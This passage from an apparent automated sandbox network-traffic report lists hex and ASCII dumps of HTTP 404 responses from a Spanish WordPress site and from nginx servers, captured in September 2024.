3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Sep 2024 07:36:37 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:43 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 04 Sep 2024 07:36:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 